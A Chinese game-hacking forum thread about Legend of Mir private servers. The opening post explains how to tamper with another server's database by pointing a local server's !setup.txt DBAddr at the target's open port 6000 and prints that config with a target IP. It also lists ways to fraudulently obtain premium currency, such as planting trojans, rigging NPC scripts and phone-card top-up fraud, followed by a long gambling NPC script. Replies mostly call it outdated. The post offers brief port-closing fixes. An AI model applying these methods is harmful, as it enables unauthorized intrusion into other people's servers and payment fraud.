WPE|52wpe|我爱WPE

注册会员
搜索
  • 2307查看
  • 16回复

金牌会员

有时你会看到服务器莫名其妙的出现很多高级装备或高等级账号,出现大量极品装备而日至无任何显示的问题.想这又是谁搞的鬼时各GM们又说不知道,那么得出的症状是你被其他的GM黑了.

别搞错,可不是众GM里的哪一位,而是来自其他私服里的GM,其实攻击的方法也很简单,具体如下:

首先: 攻击者自己开个传奇服务器,把开启6000端口的私服IP写到DBAddr=这里.
其次: 启动这个单机的服务器,在对方的服务器里面申请一个帐号,建立一个名字(此账号是高级管理员号)
再次: 对方会去他想要黑的私服里(那就是你的咯)也注册一个一样的名字和ID(这里很重要!!不然对方进自己的站是黑屏的,哈哈...)
最后: 然后在对方自己的单机服务器上刷东西(小退很重要目的是把你刷出装备的数据写入他的DB),刷出来的东西就保存到对方想黑的服务器的同名数据库!!

以下是攻击者的*:\MirServer\Mir200\!setup.txt

[Server]
ServerIndex=0
ServerName=入侵私服
ServerNumber=0
VentureServer=FALSE
TestServer=TRUE
TestLevel=7
TestGold=100
TestServerUserLimit=1000
ServiceMode=FALSE
NonPKServer=FALSE

;192.168.1.9(本机)IP (202.92.165.***)攻击者想要黑的IP(条件6000端口开着的)
DBAddr=202.92.165.22 (文章就在这里,这里是写对方要黑的IP)
DBPort=6000
IDSAddr=192.168.1.9
IDSPort=5600
MsgSrvAddr=192.168.1.9
MsgSrvPort=4900

由于对方攻击时只能默认你是6000端口(除非你被他知道你的端口),所以解决就很简单啦
解决办法如下:
1.封闭服务器6000端口(本站下载区提供了安全策略)
2.更改数据库6000端口 [推荐第一种办法]

刷元宝教程

这一课 我相信大家很感兴趣 哈哈 免费激情 GM 看过之后要深思啊 别让你的服白开
网上有很多外挂很多教程 纯他妈的瞎扯 骗子 大家不要上当啊

刷元宝方法

1.端口刷 2.外挂刷 这2种发放也就统一称为 外挂刷元宝 也可以利用这个挂 在别人的F上面做一个手脚 自己编一个脚本 无论是那个传送员 都可以 点击一下就获得几万或者更多 那么关闭这个外挂 只有一种方法 就是你的版本换端口 我相信 很多GM 朋友 都被别人攻击过

刷元宝方法

当你有种植木马或病毒技术的时候 直接攻击别人的F 这个不要我多说 如果不想让他关F 稍微做一下手脚 在某某NPC上 增加强制给与元宝即可

刷元宝方法

当您有一张快停机的电话卡 配合一个暴刷软件 哎呀呀 爽啊 欠费了 不要了 这个就是钻牛角尖 我们平时被 电信部门黑过 我们也刷他一回 这个是本人强烈推荐的 这个就是利用平台直接刷

还有一种方法 就是利用 拉斯维加斯 赌大小 我每天都要被一些玩家咨询 我都不想说了 这个有规律的 很多GM 不知道 一开F 就被人赌博 弄走了元宝 哎呀

下面我还是给大家详细说说、传奇拉斯维加斯、赌大小脚本吧 本人只谈业务 咨询的朋友绕道

大小小中小小大中中
拉斯维加斯的脚本

╔══════╦══════╦══════╦══════╗\
║『<泡泡龙机/@YB泡泡龙机>』║『<三六豹子/@YB三六豹子>』║『<猜大猜小/@YB猜大猜小>』║『<大盘点数/@YB大盘点数>』║\
╚══════╩══════╩══════╩══════╝\

┊<返回上页/@MAIN> <刷新窗口/@YB我要做庄>┊┊<①>┊┊<②>┊┊<③>┊┊<④>┊┊<⑤>┊┊<⑥>┊\

┊<查看猜数字游戏规则/@HELP>┊┊<小/@@InPutInteger32>┊┊<中/@@InPutInteger33>┊┊<大/@@InPutInteger34>┊ 离开局还有 <$STR(G40)> 秒\
┊<查看整体下注的情况/@ChaK1>┊╚┈╝╚┈╝╚┈╝ 拥有元宝数 <$GAMEGOLD>\
┊<查看自己下注的数目/@ChaK2>┊╔┈╗╔┈╗╔┈╗╔┈╗╔┈╗╔┈╗\
┊<返回上页/@MAIN> <刷新窗口/@YB我要做庄>┊┊<①/@@InPutInteger35>┊┊<②/@@InPutInteger36>┊┊<③/@@InPutInteger37>┊┊<④/@@InPutInteger38>┊┊<⑤/@@InPutInteger39>┊┊<⑥/@@InPutInteger40>┊\
╚┈┈┈┈┈┈┈┈┈╝╚┈╝╚┈╝╚┈╝╚┈╝╚┈╝╚┈╝\
#ACT
BREAK

[@@InPutInteger32]
#If
CheckLevelEx > 0
#Act
DelayGoto 1 ~InPutInteger32
[~InPutInteger32]
#IF
LARGE N23 0
#ACT
MESSAGEBOX [提示]:你已经下注押小,无法重复下注。
MOV N32 0
GOTO @YB我要做庄
BREAK

#IF
LARGE N24 0
#ACT
MESSAGEBOX [提示]:你已经下注押中,无法重复下注。
MOV N32 0
BREAK

#IF
LARGE N25 0
#ACT
MESSAGEBOX [提示]:你已经下注押大,无法重复下注。
MOV N32 0
BREAK

#IF
LARGE N32 1000
#ACT
MESSAGEBOX [提示]:请输入1-1000之间的数值!
MOV N32 0
BREAK

#IF
SMALL N32 1
#ACT
MESSAGEBOX [提示]:请输入1-1000之间的数值!
MOV N32 0
BREAK

#IF
EQUAL M23 0
CHECKGAMEGOLD > <$STR(N32)>
#ACT
GAMEGOLD - <$STR(N32)>
INC G41 <$STR(N32)>
MOV N23 <$STR(N32)>
INC G30 1
SendMSG 4 %s买了<$STR(N32)>注押“小”。
MESSAGEBOX [提示]:成功下【<$STR(N23)>】注押【小】
BREAK

#IF
CHECKGAMEGOLD > <$STR(N32)>
#ACT
MESSAGEBOX [提示]:你已经买了【<$STR(N23)>】注【小】,无法重复加注。
BREAK
#ELSEACT
MESSAGEBOX [提示]:你身上的元宝不足。
MOV N32 0
BREAK

[@@InPutInteger33]
#If
#Act
DelayGoto 1 ~InPutInteger33
[~InPutInteger33]
#IF
LARGE N23 0
#ACT
MESSAGEBOX [提示]:你已经下注押小,无法重复下注。
MOV N33 0
BREAK

#IF
LARGE N24 0
#ACT
MESSAGEBOX [提示]:你已经下注押中,无法重复下注。
MOV N33 0
BREAK

#IF
LARGE N25 0
#ACT
MESSAGEBOX [提示]:你已经下注押大,无法重复下注。
MOV N33 0
BREAK

#IF
LARGE N33 1000
#ACT
MOV N33 0
BREAK

#IF
SMALL N33 1
#ACT
MOV N33 0
BREAK

#IF
EQUAL M24 0
CHECKGAMEGOLD > <$STR(N33)>
#ACT
GAMEGOLD - <$STR(N33)>
INC G41 <$STR(N33)>
MOV N24 <$STR(N33)>
INC G31 1
SendMSG 4 %s买了<$STR(N33)>注押“中”。
MESSAGEBOX [提示]:成功下【<$STR(N24)>】注押【中】
BREAK

#IF
CHECKGAMEGOLD > <$STR(N33)>
#ACT
MESSAGEBOX [提示]:你已经买了【<$STR(N24)>】注【中】,无法重复加注。
BREAK
#ELSEACT
MESSAGEBOX [提示]:你身上的元宝不足。
MOV N33 0
BREAK

[@@InPutInteger34]
#If
#Act
DelayGoto 1 ~InPutInteger34
[~InPutInteger34]
#IF
LARGE N23 0
#ACT
MOV N34 0
BREAK

论坛元老

沙发坐一下!

1万

论坛三钻级赞助贵宾

说实话,没看明白

论坛元老

N年前的的了吧,以前好用,现在还能找到这么傻得GM?

中级会员

不太明白     太复杂了

荣誉贵宾

这个貌似看不懂

金牌会员

你这个是还别人论坛看过弄过来的吧?怀疑你自己能用不?

金牌会员

... 肯定是直接复制过来的。。 现在还有SF是开着6000端口的?

高级会员

没怎么看懂········

高级会员

不是闲复杂,而是看了帖子感觉没学的必要了

中级会员

我是新手,那权限高啊。

金牌会员

不知所云```````

1万

骨灰级元老

7000端口就常见,6000倒没怎么见过,这个教程几年前看过过,但现在估计过期了

金牌会员

这个现在还行?

骨灰级元老

现在多数是不能用了,国宝能有!

金牌会员

N年前的技术了

论坛元老

不懂 不明白。。。

快速发帖